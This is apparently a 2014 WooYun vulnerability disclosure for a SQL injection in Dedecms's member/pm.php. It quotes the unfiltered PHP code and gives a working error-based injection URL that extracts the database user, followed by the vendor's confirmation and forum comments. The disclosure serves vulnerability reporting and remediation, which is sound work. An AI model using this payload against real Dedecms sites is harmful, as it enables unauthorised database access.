当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(18) 关注此漏洞

缺陷编号: WooYun-2014-48881

漏洞标题: Dedecms 会员中心注入漏洞5

相关厂商: Dedecms

漏洞作者: Matt认证白帽子

提交时间: 2014-01-14 16:19

公开时间: 2014-04-14 16:20

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

3人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-14: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-03-10: 细节向核心白帽子及相关领域专家公开
2014-03-20: 细节向普通白帽子公开
2014-03-30: 细节向实习白帽子公开
2014-04-14: 细节向公众公开

简要描述:

Dedecms 会员中心注入漏洞5
我不是来刷洞的!

详细说明:

code 区域
member/pm.php


else if($dopost=='read')


{


    $sql = "SELECT * FROM `#@__member_friends` WHERE  mid='{$cfg_ml->M_ID}' AND ftype!='-1'  ORDER BY addtime DESC LIMIT 20";


    $friends = array();


    $dsql->SetQuery($sql);


    $dsql->Execute();


    while ($row = $dsql->GetArray()) {


        $friends[] = $row;


    }


    $row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID没过滤


    if(!is_array($row))


    {


        ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');


        exit();


    }


    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");


    $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");


    include_once(dirname(__FILE__).'/templets/pm-read.htm');


    exit();


}

漏洞证明:

测试方法**.**.**.**/dede/member/pm.php?dopost=read&id=1' and @`'` and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

QQ截图20140113223116.png

修复方案:

过滤啊!

版权声明:转载请注明来源 Matt@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-01-14 22:24

厂商回复:

已修复,感谢反馈

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-01-14 16:27 | 小川 认证白帽子 ( 核心白帽子 | Rank:1583 漏洞数:236 | 一个致力要将乌云变成搞笑论坛的男人)
    0

    洞主是来刷奖金的!

    1# 回复此人
  2. 2014-01-14 16:28 | 小驴牙牙 ( 普通白帽子 | Rank:168 漏洞数:43 | 不断学习,进步!)
    2

    可以把挖掘模板洞的整个流程,包括前期看过什么书,就某个洞分析发现过程,一些经验分享到drops里。点赞!

    2# 回复此人
  3. 2014-01-14 16:34 | 绝情刀 ( 普通白帽子 | Rank:132 漏洞数:24 | .)
    0

    @小驴牙牙 要不要把吃过啥东西也告诉你。。。

    3# 回复此人
  4. 2014-01-14 16:38 | px1624 ( 普通白帽子 | Rank:1104 漏洞数:186 | px1624)
    0

    刷钱的节奏啊!

    4# 回复此人
  5. 2014-01-14 16:52 | Matt 认证白帽子 ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)
    0

    @小川 @px1624 真没有 哈哈 我是来为国内网站的安全做奉献的!

    5# 回复此人
  6. 2014-01-14 16:56 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    今天dede被刷爆啊

    6# 回复此人
  7. 2014-01-14 17:04 | px1624 ( 普通白帽子 | Rank:1104 漏洞数:186 | px1624)
    0

    @Matt 你的漏洞全是刷钱的节奏啊!

    7# 回复此人
  8. 2014-01-14 17:07 | Matt 认证白帽子 ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)
    0

    @px1624 真没 我这不是混rank嘛

    8# 回复此人

登录后才能发表评论,请先 登录